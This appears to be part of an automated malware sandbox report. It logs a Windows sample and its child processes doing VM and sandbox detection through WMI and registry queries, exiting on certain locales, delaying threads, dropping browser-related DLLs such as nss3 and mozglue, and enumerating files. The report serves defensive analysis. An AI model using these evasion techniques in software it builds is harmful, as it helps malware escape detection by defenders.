Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_10-78942

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} where resultclass = Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = 'C:'
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID="C:"} where resultclass = Win32_DiskPartition
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent="Win32_LogicalDisk.DeviceID=\"C:\""

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Memory allocated: 256580E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Memory allocated: 25671C10000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 940000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2680000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2490000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 3070000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 3110000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 5110000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Window / User API: threadDelayed 3365
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Window / User API: threadDelayed 6225
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 4039
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 5050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 4457
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 4979

Source: C:\Users\user\Desktop\zLwT7vCojz.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_0-45200

Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pfswlxy	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wyftaheq	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\driverRemote_debug\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\driverRemote_debug\relay.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\driverRemote_debug\relay.dll	Jump to dropped file

Source: C:\Users\user\Desktop\zLwT7vCojz.exe	API coverage: 8.3 %
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	API coverage: 6.4 %
Source: C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe	API coverage: 1.9 %

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe TID: 6140	Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe TID: 1748	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8136	Thread sleep time: -28592453314249787s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8136	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -48200s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8136	Thread sleep time: -59875s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -50296s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8136	Thread sleep time: -59765s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -35164s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8136	Thread sleep time: -59654s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -55558s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -37152s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -58292s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -45531s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -31846s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -54766s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -58932s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -32840s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -43927s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6828	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3824	Thread sleep time: -600000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -41217s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -50336s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -55596s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -47999s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -32154s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2196	Thread sleep time: -600000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -54204s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -41688s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -34406s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -46910s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -54138s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -49263s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -47819s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -53139s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -41283s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -55223s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -58364s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -35062s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -35354s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -39543s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -59740s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -42710s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -49005s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -49630s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -54950s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -57170s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -53064s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8000	Thread sleep time: -33684s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep count: 39 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -35971150943733603s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -55206s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 644	Thread sleep count: 4457 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -59888s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 644	Thread sleep count: 4979 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -30041s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7732	Thread sleep time: -59776s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -36977s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -31976s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -40701s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -38418s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -55104s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -40213s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -38396s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -53243s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -53430s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -50534s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -33839s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -48486s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -45158s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -53153s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -35968s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -38866s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -37341s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -46137s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -40346s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -36239s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -46406s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -32599s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -32410s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -50326s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -58298s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -52363s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -41430s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -40697s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -54691s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -58288s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -49715s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -43198s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -38231s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2140	Thread sleep time: -34826s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UUID FROM Win32_ComputerSystemProduct

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_0041D9E1 FindFirstFileExA,	0_2_0041D9E1
Source: C:\Users\user\Desktop\zLwT7vCojz.exe	Code function: 0_2_0433DC48 FindFirstFileExA,	0_2_0433DC48
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	10_2_00412570
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	10_2_0040D1C0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_004015C0 LocalAlloc,FindFirstFileA,StrCmpCA,StrCmpCA,SetThreadLocale,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	10_2_004015C0
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	10_2_00411650
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	10_2_0040B610
Source: C:\Users\user\AppData\Local\Temp\u48o.0.exe	Code function: 10_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	10_2_0040DB60
